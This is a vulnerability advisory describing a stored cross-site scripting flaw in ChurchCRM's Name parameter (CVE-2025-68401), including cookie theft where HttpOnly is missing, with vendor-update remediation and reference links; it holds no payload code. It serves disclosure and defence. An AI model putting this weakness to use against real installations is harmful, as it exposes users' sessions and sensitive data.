SB2026040991 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in ChurchCRM

Description

This security bulletin contains information about 1 security vulnerability.

1) Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CVE-ID: CVE-2025-68401)

The vulnerability allows a remote user to execute arbitrary script in victims' browsers and disclose sensitive information.

The vulnerability exists due to cross-site scripting in the Name parameter when rendering stored user-supplied content. A remote privileged user can submit crafted HTML or JavaScript that is later viewed by other users to execute arbitrary script in victims' browsers and disclose sensitive information.

Where session cookies are not marked HttpOnly, the injected script can read document.cookie. Viewing the malicious content is required for exploitation, and privileged users such as admins or moderators may be affected.

Remediation

Install update from vendor's website.

References

• https://github.com/ChurchCRM/CRM/security/advisories/GHSA-phfw-p278-qq7v
• https://github.com/advisories/GHSA-phfw-p278-qq7v